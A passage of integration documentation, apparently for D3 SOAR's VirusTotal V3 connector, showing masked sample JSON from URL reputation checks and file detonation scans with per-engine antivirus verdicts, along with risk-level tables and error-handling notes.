"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Juniper Networks": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Juniper Networks"
},
"Heimdal Security": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Heimdal Security"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Acronis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Acronis"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"Viettel Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Viettel Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Chong Lua Dao": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Chong Lua Dao"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"Sangfor": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sangfor"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"html_meta": {
"twitter:creator": [
"@MinerGate"
],
"description": [
"Join MinerGate???s cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"twitter:image": [
"https://minergate.com/assets/share.png"
],
"twitter:site": [
"@MinerGate"
],
"MobileOptimized": [
"176"
],
"keywords": [
"main, keywords"
],
"og:image": [
"https://minergate.com/assets/share.png"
],
"viewport": [
"width=device-width, initial-scale=1, minimum-scale=1.0, user-scalable=yes"
],
"og:url": [
"https://*****.*****.***/"
],
"og:title": [
"Altcoin Cryptocurrency Mining Pools ??? MinerGate"
],
"twitter:card": [
"summary_large_image"
],
"twitter:description": [
"Join MinerGate???s cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"og:type": [
"article"
],
"og:description": [
"Join MinerGate???s cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"baidu-site-verification": [
"*****"
],
"twitter:title": [
"Altcoin Cryptocurrency Mining Pools ??? MinerGate"
],
"google-site-verification": [
"*****"
]
},
"outgoing_links": [
"https://***/***",
"https://***/***",
"https://***/***"
]
},
"type": "url",
"id": "*****",
"riskLevel": 1,
"links": {
"self": "https://www.virustotal.com/api/v3/urls/*****"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/search?query=http://*****.*****.***"
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"URLs": [
"http://*****.*****.***/"
],
"Reputations": [
-80
],
"RiskLevels": [
"High"
]
}In check reputation commands, Return Data converts the risk score from the raw data into D3-defined risk levels as a numerical value (1-5). This will be used to enrich artifacts with reputation information.
SAMPLE DATA
[
{
"URL": "http://*****.*****.***/",
"riskLevel": 1
}
]Provides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No sample data
D3-defined Risk Levels
The table below lists the possible output risk levels with the corresponding return “RiskLevels” under Key Fields:
Return Data | Key Fields “RiskLevels” |
1 | High |
2 | Medium |
3 | Low |
4 | N/A (Default) |
5 | ZeroRisk |
Error Handling
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Check URL Reputation failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: URL Not Found. |
Error Sample Data Check URL Reputation failed. Status Code: 404. Message: URL Not Found. |
Detonate Files
Uploads and analysis files.
It is not recommended to use the Test Command feature with the Detonate Files command as it is designed for dynamic input files in Playbooks, Incident Attachments, and Artifact Attachments. There is a simple workaround to test the command:
Navigate to Configuration on the top bar menu.
Click on Utility Commands on the left sidebar menu.
Use the search box to find and select the Create a File from input Text Array command.
Click on the Test tab.
Input the required information for the parameters.
Click on the Test Command button. A D3 File ID will appear in the output data after the file has been successfully created. The D3 File Source of the created file will be Playbook File.
Input
Input Parameter | Required/Optional | Description | Example |
File IDs | Required | The file paths of the file source. The options for file paths are:
|
JSON
|
File Source | Required | The file source of the file to detonate. The options for file sources are:
| Incident Attachment File |
Output
Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulThe primary response data from the API request.
D3 enriches the raw data from the original VirusTotal API response by adding the file_id field to indicate your input File IDs.
SAMPLE DATA
{
"meta": {
"file_info": {
"size": 11776,
"sha256": "*****",
"name": "*****.exe",
"md5": "*****",
"sha1": "*****"
}
},
"data": {
"attributes": {
"date": 1625780879,
"status": "completed",
"stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 0,
"timeout": 0,
"failure": 0,
"malicious": 19,
"undetected": 50
},
"results": {
"Bkav": {
"category": "undetected",
"engine_name": "Bkav",
"engine_version": "***.***.***.***",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Lionic": {
"category": "undetected",
"engine_name": "Lionic",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Elastic": {
"category": "undetected",
"engine_name": "Elastic",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210706"
},
"DrWeb": {
"category": "undetected",
"engine_name": "DrWeb",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"MicroWorld-eScan": {
"category": "malicious",
"engine_name": "MicroWorld-eScan",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"FireEye": {
"category": "malicious",
"engine_name": "FireEye",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"CAT-QuickHeal": {
"category": "undetected",
"engine_name": "CAT-QuickHeal",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"McAfee": {
"category": "malicious",
"engine_name": "McAfee",
"engine_version": "*.*.*.*",
"result": "Artemis!E327AB5F240F",
"method": "blacklist",
"engine_update": "20210708"
},
"Cylance": {
"category": "undetected",
"engine_name": "Cylance",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Zillya": {
"category": "undetected",
"engine_name": "Zillya",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Sangfor": {
"category": "undetected",
"engine_name": "Sangfor",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210625"
},
"K7AntiVirus": {
"category": "undetected",
"engine_name": "K7AntiVirus",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Alibaba": {
"category": "undetected",
"engine_name": "Alibaba",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20190527"
},
"K7GW": {
"category": "undetected",
"engine_name": "K7GW",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"CrowdStrike": {
"category": "undetected",
"engine_name": "CrowdStrike",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210203"
},
"BitDefenderTheta": {
"category": "malicious",
"engine_name": "BitDefenderTheta",
"engine_version": "*.*.*.*",
"result": "Gen:NN.ZemsilF.34790.am0@aWoTqJd",
"method": "blacklist",
"engine_update": "20210702"
},
"Cyren": {
"category": "undetected",
"engine_name": "Cyren",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"SymantecMobileInsight": {
"category": "type-unsupported",
"engine_name": "SymantecMobileInsight",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210126"
},
"Symantec": {
"category": "undetected",
"engine_name": "Symantec",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ESET-NOD32": {
"category": "undetected",
"engine_name": "ESET-NOD32",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"APEX": {
"category": "malicious",
"engine_name": "APEX",
"engine_version": "*.*",
"result": "Malicious",
"method": "blacklist",
"engine_update": "20210707"
},
"Paloalto": {
"category": "malicious",
"engine_name": "Paloalto",
"engine_version": "*.*",
"result": "generic.ml",
"method": "blacklist",
"engine_update": "20210708"
},
"ClamAV": {
"category": "undetected",
"engine_name": "ClamAV",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Kaspersky": {
"category": "malicious",
"engine_name": "Kaspersky",
"engine_version": "*.*.*.*",
"result": "HEUR:Trojan.MSIL.Dnoper.gen",
"method": "blacklist",
"engine_update": "20210708"
},
"BitDefender": {
"category": "malicious",
"engine_name": "BitDefender",
"engine_version": "*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"NANO-Antivirus": {
"category": "undetected",
"engine_name": "NANO-Antivirus",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"SUPERAntiSpyware": {
"category": "undetected",
"engine_name": "SUPERAntiSpyware",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210703"
},
"Avast": {
"category": "undetected",
"engine_name": "Avast",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Tencent": {
"category": "undetected",
"engine_name": "Tencent",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Ad-Aware": {
"category": "malicious",
"engine_name": "Ad-Aware",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"Trustlook": {
"category": "type-unsupported",
"engine_name": "Trustlook",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"TACHYON": {
"category": "undetected",
"engine_name": "TACHYON",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Sophos": {
"category": "undetected",
"engine_name": "Sophos",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Comodo": {
"category": "undetected",
"engine_name": "Comodo",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"F-Secure": {
"category": "undetected",
"engine_name": "F-Secure",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Baidu": {
"category": "undetected",
"engine_name": "Baidu",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20190318"
},
"VIPRE": {
"category": "undetected",
"engine_name": "VIPRE",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"TrendMicro": {
"category": "undetected",
"engine_name": "TrendMicro",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"McAfee-GW-Edition": {
"category": "malicious",
"engine_name": "McAfee-GW-Edition",
"engine_version": "*.*.*",
"result": "Artemis",
"method": "blacklist",
"engine_update": "20210708"
},
"Trapmine": {
"category": "type-unsupported",
"engine_name": "Trapmine",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20200727"
},
"CMC": {
"category": "undetected",
"engine_name": "CMC",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210624"
},
"Emsisoft": {
"category": "malicious",
"engine_name": "Emsisoft",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287 (B)",
"method": "blacklist",
"engine_update": "20210708"
},
"Ikarus": {
"category": "undetected",
"engine_name": "Ikarus",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"GData": {
"category": "malicious",
"engine_name": "GData",
"engine_version": "*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"Jiangmin": {
"category": "undetected",
"engine_name": "Jiangmin",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210707"
},
"Webroot": {
"category": "undetected",
"engine_name": "Webroot",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Avira": {
"category": "undetected",
"engine_name": "Avira",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Antiy-AVL": {
"category": "undetected",
"engine_name": "Antiy-AVL",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Kingsoft": {
"category": "undetected",
"engine_name": "Kingsoft",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Gridinsoft": {
"category": "undetected",
"engine_name": "Gridinsoft",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Arcabit": {
"category": "malicious",
"engine_name": "Arcabit",
"engine_version": "*.*.*.*",
"result": "Trojan.Bulz.D30E5F",
"method": "blacklist",
"engine_update": "20210708"
},
"ViRobot": {
"category": "undetected",
"engine_name": "ViRobot",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ZoneAlarm": {
"category": "malicious",
"engine_name": "ZoneAlarm",
"engine_version": "*.*",
"result": "HEUR:Trojan.MSIL.Dnoper.gen",
"method": "blacklist",
"engine_update": "20210708"
},
"Avast-Mobile": {
"category": "type-unsupported",
"engine_name": "Avast-Mobile",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Microsoft": {
"category": "undetected",
"engine_name": "Microsoft",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Cynet": {
"category": "undetected",
"engine_name": "Cynet",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"BitDefenderFalx": {
"category": "type-unsupported",
"engine_name": "BitDefenderFalx",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210610"
},
"AhnLab-V3": {
"category": "malicious",
"engine_name": "AhnLab-V3",
"engine_version": "*.*.*.*",
"result": "Trojan/Win32.RL_Agent.C3601071",
"method": "blacklist",
"engine_update": "20210708"
},
"Acronis": {
"category": "undetected",
"engine_name": "Acronis",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210512"
},
"VBA32": {
"category": "undetected",
"engine_name": "VBA32",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ALYac": {
"category": "malicious",
"engine_name": "ALYac",
"engine_version": "*.*.*.*",
"result": "*.*.*",
"method": "blacklist",
"engine_update": "20210708"
},
"MAX": {
"category": "malicious",
"engine_name": "MAX",
"engine_version": "*.*.*.*",
"result": "malware (ai score=87)",
"method": "blacklist",
"engine_update": "20210708"
},
"Malwarebytes": {
"category": "undetected",
"engine_name": "Malwarebytes",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Zoner": {
"category": "undetected",
"engine_name": "Zoner",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210707"
},
"TrendMicro-HouseCall": {
"category": "undetected",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Rising": {
"category": "undetected",
"engine_name": "Rising",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Yandex": {
"category": "undetected",
"engine_name": "Yandex",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"SentinelOne": {
"category": "undetected",
"engine_name": "SentinelOne",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210703"
},
"eGambit": {
"category": "malicious",
"engine_name": "eGambit",
"engine_version": *****,
"result": "Trojan.Generic",
"method": "blacklist",
"engine_update": "20210708"
},
"Fortinet": {
"category": "undetected",
"engine_name": "Fortinet",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"MaxSecure": {
"category": "undetected",
"engine_name": "MaxSecure",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Cybereason": {
"category": "malicious",
"engine_name": "Cybereason",
"engine_version": "*.*.*.*",
"result": "malicious.f240f8",
"method": "blacklist",
"engine_update": "20210330"
},
"Panda": {
"category": "undetected",
"engine_name": "Panda",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Qihoo-360": {
"category": "undetected",
"engine_name": "Qihoo-360",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
}
}
},
"type": "analysis",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/analyses/***"
}
}
}The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
Same as Raw Data, D3 enriches the context data from the original VirusTotal API response by adding the file_id field to indicate your input File IDs.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
{
"meta": {
"file_info": {
"size": 11776,
"sha256": "*****",
"name": "***.exe",
"md5": "*****",
"sha1": "*****"
}
},
"data": {
"attributes": {
"date": 1625780879,
"status": "completed",
"stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 0,
"timeout": 0,
"failure": 0,
"malicious": 19,
"undetected": 50
},
"results": {
"Bkav": {
"category": "undetected",
"engine_name": "Bkav",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Lionic": {
"category": "undetected",
"engine_name": "Lionic",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Elastic": {
"category": "undetected",
"engine_name": "Elastic",
"engine_version": "*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210706"
},
"DrWeb": {
"category": "undetected",
"engine_name": "DrWeb",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"MicroWorld-eScan": {
"category": "malicious",
"engine_name": "MicroWorld-eScan",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"FireEye": {
"category": "malicious",
"engine_name": "FireEye",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"CAT-QuickHeal": {
"category": "undetected",
"engine_name": "CAT-QuickHeal",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"McAfee": {
"category": "malicious",
"engine_name": "McAfee",
"engine_version": "*.*.*.*",
"result": "Artemis!E327AB5F240F",
"method": "blacklist",
"engine_update": "20210708"
},
"Cylance": {
"category": "undetected",
"engine_name": "Cylance",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Zillya": {
"category": "undetected",
"engine_name": "Zillya",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Sangfor": {
"category": "undetected",
"engine_name": "Sangfor",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210625"
},
"K7AntiVirus": {
"category": "undetected",
"engine_name": "K7AntiVirus",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Alibaba": {
"category": "undetected",
"engine_name": "Alibaba",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20190527"
},
"K7GW": {
"category": "undetected",
"engine_name": "K7GW",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"CrowdStrike": {
"category": "undetected",
"engine_name": "CrowdStrike",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210203"
},
"BitDefenderTheta": {
"category": "malicious",
"engine_name": "BitDefenderTheta",
"engine_version": "*.*.*.*",
"result": "Gen:NN.ZemsilF.34790.am0@aWoTqJd",
"method": "blacklist",
"engine_update": "20210702"
},
"Cyren": {
"category": "undetected",
"engine_name": "Cyren",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"SymantecMobileInsight": {
"category": "type-unsupported",
"engine_name": "SymantecMobileInsight",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210126"
},
"Symantec": {
"category": "undetected",
"engine_name": "Symantec",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"ESET-NOD32": {
"category": "undetected",
"engine_name": "ESET-NOD32",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"APEX": {
"category": "malicious",
"engine_name": "APEX",
"engine_version": "*.*",
"result": "Malicious",
"method": "blacklist",
"engine_update": "20210707"
},
"Paloalto": {
"category": "malicious",
"engine_name": "Paloalto",
"engine_version": "*.*",
"result": "generic.ml",
"method": "blacklist",
"engine_update": "20210708"
},
"ClamAV": {
"category": "undetected",
"engine_name": "ClamAV",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Kaspersky": {
"category": "malicious",
"engine_name": "Kaspersky",
"engine_version": "*.*.*.*",
"result": "HEUR:Trojan.MSIL.Dnoper.gen",
"method": "blacklist",
"engine_update": "20210708"
},
"BitDefender": {
"category": "malicious",
"engine_name": "BitDefender",
"engine_version": "*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"NANO-Antivirus": {
"category": "undetected",
"engine_name": "NANO-Antivirus",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"SUPERAntiSpyware": {
"category": "undetected",
"engine_name": "SUPERAntiSpyware",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210703"
},
"Avast": {
"category": "undetected",
"engine_name": "Avast",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Tencent": {
"category": "undetected",
"engine_name": "Tencent",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Ad-Aware": {
"category": "malicious",
"engine_name": "Ad-Aware",
"engine_version": "*.*.*.*",
"result": "Gen:Variant.Bulz.200287",
"method": "blacklist",
"engine_update": "20210708"
},
"Trustlook": {
"category": "type-unsupported",
"engine_name": "Trustlook",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"TACHYON": {
"category": "undetected",
"engine_name": "TACHYON",
"engine_version": "*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Sophos": {
"category": "undetected",
"engine_name": "Sophos",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Comodo": {
"category": "undetected",
"engine_name": "Comodo",
"engine_version": "*****",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"F-Secure": {
"category": "undetected",
"engine_name": "F-Secure",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20210708"
},
"Baidu": {
"category": "undetected",
"engine_name": "Baidu",
"engine_version": "*.*.*.*",
"result": null,
"method": "blacklist",
"engine_update": "20190318"
},
